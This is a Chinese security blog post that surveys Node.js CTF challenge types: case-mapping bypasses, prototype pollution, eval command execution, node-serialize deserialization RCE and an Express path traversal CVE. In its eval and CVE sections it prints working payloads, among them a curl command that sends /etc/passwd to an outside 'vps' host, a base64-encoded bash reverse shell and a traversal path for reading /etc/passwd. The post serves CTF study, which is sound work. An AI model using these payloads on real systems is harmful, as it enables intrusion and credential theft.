<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web,">










<meta name="description" content="0x00 序言之前看各位大师傅说以后web会向python,js,java(主要是java)发展,php的题目会越来越少.这次公益赛就遇到了.好好学习一下.">
<meta name="keywords" content="web">
<meta property="og:type" content="article">
<meta property="og:title" content="NodeJS常见题型">
<meta property="og:url" content="https://Horizoncy.github.io/2020/03/11/NodeJS常见题型/index.html">
<meta property="og:site_name" content="Horizon&#39;s Security Notes">
<meta property="og:description" content="0x00 序言之前看各位大师傅说以后web会向python,js,java(主要是java)发展,php的题目会越来越少.这次公益赛就遇到了.好好学习一下.">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2020-03-11T11:06:42.275Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="NodeJS常见题型">
<meta name="twitter:description" content="0x00 序言之前看各位大师傅说以后web会向python,js,java(主要是java)发展,php的题目会越来越少.这次公益赛就遇到了.好好学习一下.">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://Horizoncy.github.io/2020/03/11/NodeJS常见题型/">





  <title>NodeJS常见题型 | Horizon's Security Notes</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Horizon's Security Notes</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">With great power comes great responsibility.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://Horizoncy.github.io/2020/03/11/NodeJS常见题型/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Horizon">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Horizon's Security Notes">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">NodeJS常见题型</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-03-11T19:00:00+08:00">
                2020-03-11
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.5k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  10
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="0x00-序言"><a href="#0x00-序言" class="headerlink" title="0x00 序言"></a>0x00 序言</h1><p>之前看各位大师傅说以后web会向python,js,java(主要是java)发展,php的题目会越来越少.这次公益赛就遇到了.好好学习一下.</p>
<a id="more"></a>
<h1 id="0x01-javascript大小写特性"><a href="#0x01-javascript大小写特性" class="headerlink" title="0x01 javascript大小写特性"></a>0x01 javascript大小写特性</h1><p>在javascript中有几个特殊的字符需要记录一下</p>
<p>对于toUpperCase():</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">字符&quot;ı&quot;、&quot;ſ&quot; 经过toUpperCase处理后结果为 &quot;I&quot;、&quot;S&quot;</span><br></pre></td></tr></table></figure>

<p>对于toLowerCase():</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">字符&quot;K&quot;经过toLowerCase处理后结果为&quot;k&quot;(这个K不是K)</span><br></pre></td></tr></table></figure>

<p>在绕一些规则的时候就可以利用这几个特殊字符进行绕过.<br><a href="https://xz.aliyun.com/t/7177" target="_blank" rel="noopener">HackTM中一道Node.js题分析(Draw with us)</a></p>
<h1 id="0x02-js原型链污染"><a href="#0x02-js原型链污染" class="headerlink" title="0x02 js原型链污染"></a>0x02 js原型链污染</h1><h2 id="2-1prototype和proto"><a href="#2-1prototype和proto" class="headerlink" title="2.1prototype和proto"></a>2.1prototype和<strong>proto</strong></h2><p>Javascript里每个类都有一个prototype的属性，用来绑定所有对象都会有变量与函数，对象的构造函数又指向类本身，同时对象的<strong>proto</strong>属性也指向类的prototype。因此，有以下关系：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">a=&#123;&#125;</span><br><span class="line">&#123;&#125;</span><br><span class="line">a.constructor.prototype == Object.prototype</span><br><span class="line">true</span><br><span class="line">a.__proto__ == Object.prototype</span><br><span class="line">true</span><br></pre></td></tr></table></figure>

<p>所以，总结一下：</p>
<ul>
<li>prototype是一个类的属性，所有类对象在实例化的时候将会拥有prototype中的属性和方法</li>
<li>一个对象的<strong>proto</strong>属性，指向这个对象所在的类的prototype属性<h2 id="2-2JavaScript原型链继承"><a href="#2-2JavaScript原型链继承" class="headerlink" title="2.2JavaScript原型链继承"></a>2.2JavaScript原型链继承</h2>并且，类的继承是通过原型链传递的，一个类的prototype属性指向其继承的类的一个对象。所以一个类的prototype.<strong>proto</strong>等于其父类的prototype，当然也等于该类对象的<strong>proto</strong>.<strong>proto</strong>属性。</li>
</ul>
<p>我们获取某个对象的某个成员时，如果找不到，就会通过原型链一步步往上找，直到某个父类的原型为null为止。所以修改对象的某个父类的prototype的原型就可以通过原型链影响到跟此类有关的所有对象。</p>
<p>所有类对象在实例化的时候将会拥有prototype中的属性和方法，这个特性被用来实现JavaScript中的继承机制。</p>
<p>比如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function Father() &#123;</span><br><span class="line">    this.first_name = &apos;Donald&apos;</span><br><span class="line">    this.last_name = &apos;Trump&apos;</span><br><span class="line">&#125;</span><br><span class="line">function Son() &#123;</span><br><span class="line">    this.first_name = &apos;Melania&apos;</span><br><span class="line">&#125;</span><br><span class="line">Son.prototype = new Father()</span><br><span class="line">let son = new Son()</span><br><span class="line">console.log(`Name: $&#123;son.first_name&#125; $&#123;son.last_name&#125;`)</span><br></pre></td></tr></table></figure>

<p>总结一下，对于对象son，在调用son.last_name的时候，实际上JavaScript引擎会进行如下操作：</p>
<ol>
<li>在对象son中寻找last_name</li>
<li>如果找不到，则在son.<strong>proto</strong>中寻找last_name</li>
<li>如果仍然找不到，则继续在son.<strong>proto</strong>.<strong>proto</strong>中寻找last_name</li>
<li>依次寻找，直到找到null结束。比如，Object.prototype的<strong>proto</strong>就是null</li>
</ol>
<p>JavaScript的这个查找的机制，被运用在面向对象的继承中，被称作prototype继承链。</p>
<p>以上就是最基础的JavaScript面向对象编程，我们并不深入研究更细节的内容，只要牢记以下几点即可：</p>
<ol>
<li>每个构造函数(constructor)都有一个原型对象(prototype)</li>
<li>对象的<strong>proto</strong>属性，指向类的原型对象prototype</li>
<li>JavaScript使用prototype链实现继承机制<h2 id="2-3原型链污染"><a href="#2-3原型链污染" class="headerlink" title="2.3原型链污染"></a>2.3原型链污染</h2></li>
<li>1中说到，foo.<strong>proto</strong>指向的是Foo类的prototype。那么，如果我们修改了foo.<strong>proto</strong>中的值，是不是就可以修改Foo类呢？</li>
</ol>
<p>做个简单的实验：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">// foo是一个简单的JavaScript对象</span><br><span class="line">let foo = &#123;bar: 1&#125;</span><br><span class="line">// foo.bar 此时为1</span><br><span class="line">console.log(foo.bar)</span><br><span class="line">// 修改foo的原型（即Object）</span><br><span class="line">foo.__proto__.bar = 2</span><br><span class="line">// 由于查找顺序的原因，foo.bar仍然是1</span><br><span class="line">console.log(foo.bar)</span><br><span class="line">// 此时再用Object创建一个空的zoo对象</span><br><span class="line">let zoo = &#123;&#125;</span><br><span class="line">// 查看zoo.bar</span><br><span class="line">console.log(zoo.bar)</span><br></pre></td></tr></table></figure>

<p>原因也显而易见：因为前面我们修改了foo的原型foo.<strong>proto</strong>.bar = 2，而foo是一个Object类的实例，所以实际上是修改了Object这个类，给这个类增加了一个属性bar，值为2。<br>后来，我们又用Object类创建了一个zoo对象let zoo = {}，zoo对象自然也有一个bar属性了。</p>
<p>那么，在一个应用中，如果攻击者控制并修改了一个对象的原型，那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染。</p>
<p>这里还有个例子:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">a = &#123;&#125;</span><br><span class="line">&#123;&#125;</span><br><span class="line">b = &#123;&#125;</span><br><span class="line">&#123;&#125;</span><br><span class="line">a.__proto__.c = &apos;123&apos;</span><br><span class="line">&quot;123&quot;</span><br><span class="line">a.c</span><br><span class="line">&quot;123&quot;</span><br><span class="line">b.c</span><br><span class="line">&quot;123&quot;</span><br></pre></td></tr></table></figure>

<h2 id="2-4污染的应用情况"><a href="#2-4污染的应用情况" class="headerlink" title="2.4污染的应用情况"></a>2.4污染的应用情况</h2><p>在实际应用中，哪些情况下可能存在原型链能被攻击者修改的情况呢？</p>
<p>我们思考一下，哪些情况下我们可以设置<strong>proto</strong>的值呢？其实找找能够控制数组（对象）的“键名”的操作即可：</p>
<ul>
<li>对象merge</li>
<li>对象clone（其实内核就是将待操作的对象merge到一个空对象中）<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">以对象merge为例，我们想象一个简单的merge函数：</span><br><span class="line">function merge(target, source) &#123;</span><br><span class="line">    for (let key in source) &#123;</span><br><span class="line">        if (key in source &amp;&amp; key in target) &#123;</span><br><span class="line">            merge(target[key], source[key])</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            target[key] = source[key]</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>在合并的过程中，存在赋值的操作target[key] = source[key]，那么，这个key如果是<strong>proto</strong>，是不是就可以原型链污染呢？<br>我们用如下代码实验一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">let o1 = &#123;&#125;</span><br><span class="line">let o2 = &#123;a: 1, &quot;__proto__&quot;: &#123;b: 2&#125;&#125;</span><br><span class="line">merge(o1, o2)</span><br><span class="line">console.log(o1.a, o1.b)</span><br><span class="line">o3 = &#123;&#125;</span><br><span class="line">console.log(o3.b)</span><br></pre></td></tr></table></figure>

<p>结果是，合并虽然成功了，但原型链没有被污染<br>这是因为，我们用JavaScript创建o2的过程（let o2 = {a: 1, “<strong>proto</strong>“: {b: 2}}）中，<strong>proto</strong>已经代表o2的原型了，此时遍历o2的所有键名，你拿到的是[a, b]，<strong>proto</strong>并不是一个key，自然也不会修改Object的原型。</p>
<p>那么，如何让<strong>proto</strong>被认为是一个键名呢？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">我们将代码改成如下：</span><br><span class="line">let o1 = &#123;&#125;</span><br><span class="line">let o2 = JSON.parse(&apos;&#123;&quot;a&quot;: 1, &quot;__proto__&quot;: &#123;&quot;b&quot;: 2&#125;&#125;&apos;)</span><br><span class="line">merge(o1, o2)</span><br><span class="line">console.log(o1.a, o1.b)</span><br><span class="line"></span><br><span class="line">o3 = &#123;&#125;</span><br><span class="line">console.log(o3.b)</span><br></pre></td></tr></table></figure>

<p>可见，新建的o3对象，也存在b属性，说明Object已经被污染<br>这是因为，JSON解析的情况下，<strong>proto</strong>会被认为是一个真正的“键名”，而不代表“原型”，所以在遍历o2的时候会存在这个键。</p>
<p>merge操作是最常见可能控制键名的操作，也最能被原型链攻击，很多常见的库都存在这个问题。</p>
<h1 id="0x03-危险函数导致命令执行"><a href="#0x03-危险函数导致命令执行" class="headerlink" title="0x03 危险函数导致命令执行"></a>0x03 危险函数导致命令执行</h1><h2 id="3-1eval"><a href="#3-1eval" class="headerlink" title="3.1eval()"></a>3.1eval()</h2><p>eval() 函数可计算某个字符串，并执行其中的的 JavaScript 代码。和PHP中eval函数一样，如果传递到函数中的参数可控并且没有经过严格的过滤时，就会导致漏洞的出现。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">简单例子main.js:</span><br><span class="line">var express = require(&quot;express&quot;);</span><br><span class="line">var app = express();</span><br><span class="line">app.get(&apos;/eval&apos;,function(req,res)&#123;</span><br><span class="line">    res.send(eval(req.query.q));</span><br><span class="line">    console.log(req.query.q);</span><br><span class="line">&#125;)</span><br><span class="line">var server = app.listen(8888, function() &#123;</span><br><span class="line">    console.log(&quot;应用实例，访问地址为 http://127.0.0.1:8888/&quot;);</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p><strong>漏洞利用：</strong><br>Node.js中的chile_process.exec调用的是/bash.sh，它是一个bash解释器，可以执行系统命令。在eval函数的参数中可以构造require(‘child_process’).exec(‘’);来进行调用。</p>
<p>弹计算器(windows)：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/eval?q=require(&apos;child_process&apos;).exec(&apos;calc&apos;);</span><br></pre></td></tr></table></figure>

<p>读取文件(linux)：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/eval?q=require(&apos;child_process&apos;).exec(&apos;curl -F &quot;x=`cat /etc/passwd`&quot; http://vps&apos;);;</span><br></pre></td></tr></table></figure>

<p>反弹shell(linux)：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/eval?q=require(&apos;child_process&apos;).exec(&apos;echo YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMjcuMC4wLjEvMzMzMyAwPiYx|base64 -d|bash&apos;);</span><br></pre></td></tr></table></figure>

<p>YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMjcuMC4wLjEvMzMzMyAwPiYx是bash -i &gt;&amp; /dev/tcp/127.0.0.1/3333 0&gt;&amp;1 BASE64加密后的结果，直接调用会报错。<br>注意：BASE64加密后的字符中有一个+号需要url编码为%2B(一定情况下)</p>
<p>如果上下文中没有require(类似于Code-Breaking 2018 Thejs)，则可以使用global.process.mainModule.constructor._load(‘child_process’).exec(‘calc’)来执行命令.</p>
<h2 id="3-2类似命令"><a href="#3-2类似命令" class="headerlink" title="3.2类似命令"></a>3.2类似命令</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">间隔两秒执行函数：</span><br><span class="line">setInteval(some_function, 2000)</span><br><span class="line">两秒后执行函数：</span><br><span class="line">setTimeout(some_function, 2000);</span><br></pre></td></tr></table></figure>

<p>some_function处就类似于eval函数的参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">输出HelloWorld：</span><br><span class="line">Function(&quot;console.log(&apos;HelloWolrd&apos;)&quot;)()</span><br></pre></td></tr></table></figure>

<p>类似于php中的create_function<br>以上都可以导致命令执行</p>
<h1 id="0x04-node-serialize反序列化RCE漏洞-CVE-2017-5941"><a href="#0x04-node-serialize反序列化RCE漏洞-CVE-2017-5941" class="headerlink" title="0x04 node-serialize反序列化RCE漏洞(CVE-2017-5941)"></a>0x04 node-serialize反序列化RCE漏洞(CVE-2017-5941)</h1><p>漏洞出现在node-serialize模块0.0.4版本当中.</p>
<h2 id="4-1了解什么是IIFE："><a href="#4-1了解什么是IIFE：" class="headerlink" title="4.1了解什么是IIFE："></a>4.1了解什么是IIFE：</h2><p><a href="https://developer.mozilla.org/zh-CN/docs/Glossary/%E7%AB%8B%E5%8D%B3%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0%E8%A1%A8%E8%BE%BE%E5%BC%8F" target="_blank" rel="noopener">IIFE（立即调用函数表达式）</a>是一个在定义时就会立即执行的 JavaScript 函数。</p>
<p>IIFE一般写成下面的形式：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(function()&#123; /* code */ &#125;());</span><br><span class="line">// 或者</span><br><span class="line">(function()&#123; /* code */ &#125;)();</span><br></pre></td></tr></table></figure>

<h2 id="4-2node-serialize-0-0-4漏洞点"><a href="#4-2node-serialize-0-0-4漏洞点" class="headerlink" title="4.2node-serialize@0.0.4漏洞点"></a><a href="mailto:4.2node-serialize@0.0.4" target="_blank" rel="noopener">4.2node-serialize@0.0.4</a>漏洞点</h2><p>漏洞代码位于node_modules\node-serialize\lib\serialize.js大概75行中：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">obj[key] = eval(&apos;(&apos; + obj[key].substring(FUNCFLAG.length) + &apos;)&apos;);</span><br></pre></td></tr></table></figure>

<p>可以看到传递给eval的参数是用括号包裹的，所以如果构造一个function(){}()函数，在反序列化时就会被当中IIFE立即调用执行。</p>
<h2 id="4-3构造Payload"><a href="#4-3构造Payload" class="headerlink" title="4.3构造Payload"></a>4.3构造Payload</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">serialize = require(&apos;node-serialize&apos;);</span><br><span class="line">var test = &#123;</span><br><span class="line"> rce : function()&#123;require(&apos;child_process&apos;).exec(&apos;ls /&apos;,function(error, stdout, stderr)&#123;console.log(stdout)&#125;);&#125;,</span><br><span class="line">&#125;</span><br><span class="line">console.log(&quot;序列化生成的 Payload: \n&quot; + serialize.serialize(test));</span><br></pre></td></tr></table></figure>

<p>生成的Payload为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;rce&quot;:&quot;_$$ND_FUNC$$_function()&#123;require(&apos;child_process&apos;).exec(&apos;ls /&apos;,function(error, stdout, stderr)&#123;console.log(stdout)&#125;);&#125;&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>因为需要在反序列化时让其立即调用我们构造的函数，所以我们需要在生成的序列化语句的函数后面再添加一个()，结果如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;rce&quot;:&quot;_$$ND_FUNC$$_function()&#123;require(&apos;child_process&apos;).exec(&apos;ls /&apos;,function(error, stdout, stderr)&#123;console.log(stdout)&#125;);&#125;()&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>(这里不能直接在对象内定义IIFE表达式，不然会序列化失败)<br>传递给unserialize(注意转义单引号)：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">var serialize = require(&apos;node-serialize&apos;);</span><br><span class="line">var payload = &apos;&#123;&quot;rce&quot;:&quot;_$$ND_FUNC$$_function()&#123;require(\&apos;child_process\&apos;).exec(\&apos;ls /\&apos;,function(error, stdout, stderr)&#123;console.log(stdout)&#125;);&#125;()&quot;&#125;&apos;;</span><br><span class="line">serialize.unserialize(payload);</span><br></pre></td></tr></table></figure>

<p>执行命令成功</p>
<h1 id="0x05-Node-js-目录穿越漏洞复现-CVE-2017-14849"><a href="#0x05-Node-js-目录穿越漏洞复现-CVE-2017-14849" class="headerlink" title="0x05 Node.js 目录穿越漏洞复现(CVE-2017-14849)"></a>0x05 Node.js 目录穿越漏洞复现(CVE-2017-14849)</h1><p>在vulhub上面可以直接下载到环境。</p>
<p>漏洞影响的版本：</p>
<ul>
<li>Node.js 8.5.0 + Express 3.19.0-3.21.2</li>
<li>Node.js 8.5.0 + Express 4.11.0-4.15.5<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">运行漏洞环境：</span><br><span class="line">cd vulhub/node/CVE-2017-14849/</span><br><span class="line">docker-compose build</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>用Burpsuite获取(GET)地址：/static/../../../a/../../../../etc/passwd 即可下载到/etc/passwd文件.<br>具体分析可见：<a href="https://security.tencent.com/index.php/blog/msg/121" target="_blank" rel="noopener">Node.js CVE-2017-14849 漏洞分析</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" <i class="fa fa-tag"> web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/06/反弹shell/" rel="next" title="反弹shell">
                <i class="fa fa-chevron-left"></i> 反弹shell
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/06/22/2020网鼎杯朱雀组WEB——NMAP&PHPWEB/" rel="prev" title="2020网鼎杯朱雀组WEB-NMAP&PHPWEB">
                2020网鼎杯朱雀组WEB-NMAP&PHPWEB <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
<span class="jiathis_txt">分享到：</span>
<a class="jiathis_button_fav">收藏夹</a>
<a class="jiathis_button_copy">复制网址</a>
<a class="jiathis_button_email">邮件</a>
<a class="jiathis_button_weixin">微信</a>
<a class="jiathis_button_qzone">QQ空间</a>
<a class="jiathis_button_tqq">腾讯微博</a>
<a class="jiathis_button_douban">豆瓣</a>
<a class="jiathis_button_share">一键分享</a>

<a href="http://www.jiathis.com/share?uid=2140465" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank">更多</a>
<a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript">
var jiathis_config={
  data_track_clickback:true,
  summary:"",
  shortUrl:false,
  hideMore:false
}
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js?uid=" charset="utf-8"></script>
<!-- JiaThis Button END -->
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Horizon">
            
              <p class="site-author-name" itemprop="name">Horizon</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Horizoncy" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
